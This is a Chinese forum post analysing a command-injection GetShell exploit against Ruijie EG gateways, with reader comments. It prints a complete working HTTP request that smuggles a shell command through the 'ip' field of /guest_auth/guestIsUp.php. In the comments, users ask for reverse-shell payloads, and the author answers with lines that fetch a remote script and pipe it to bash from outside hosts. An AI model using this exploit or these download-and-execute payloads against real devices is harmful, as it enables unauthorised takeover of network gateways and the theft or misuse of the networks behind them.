锐捷网关系列通杀GetShell代码分析
print 漏洞分析 592282浏览 · 2021-01-14 09:39

2020 1-11 看到群里发了一个锐捷网关系列通杀GetShell 的漏洞
https://github.com/Tas9er/EgGateWayGetShell

下载jar 文件。使用jd-gui 打开源码。

可以看到的是。
通过POST /guest_auth/guestIsUp.php URL post 了一个代码执行的命令。

EXP如下:

POST /guest_auth/guestIsUp.php HTTP/1.1
Host: 192.168.10.1
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 56


mac=1&ip=127.0.0.1|curl xxx.dnslog.cn

反弹shell 回来。查看一下代码是什么样子的。

啊。这。代码。直接调用cmd 代码执行了。

13 条评论
某人
表情
可输入 255
SINFVNCTION
2021-01-15 08:51 0 回复

@print 师傅 我这边一直反弹不回来shell 可以加微信请教吗


SINFVNCTION
2021-01-15 08:24 0 回复

@lzd**** 你能连上shell吗


lzd****
2021-01-15 07:00 0 回复

@SINFVNCTION 我傻了 没转过来


clean****
2021-01-15 05:46 0 回复

找到了


clean****
2021-01-15 05:21 0 回复

github项目不见了呀,还有下载链接吗


SINFVNCTION
2021-01-15 03:25 0 回复

@lzd**** 被杀了呀 大兄弟


SINFVNCTION
2021-01-15 03:25 0 回复

tql师傅,我2b了,这都没想到,一开始用$(echo xxxx|base64 -d|bash) 然后一直不行


lzd****
2021-01-15 03:22 0 回复

访问的时候


lzd****
2021-01-15 03:21 0 回复

一直显示404

咋整呀老哥


bur0ne
2021-01-15 02:52 0 回复

可以的师傅


print
2021-01-15 02:36 1 回复


的有actionscript
mac=1&ip=`curl http://155.94.154.207:8080/help.sh |bash`


print
2021-01-15 02:35 1 回复

@SINFVNCTION mac=1&ip=curl http://114.114.114.114:8080/help.sh |bash


SINFVNCTION
2021-01-15 01:09 0 回复

想问一下是怎么做到反弹shell的,我编码怎么都弹不回来,求payload


目录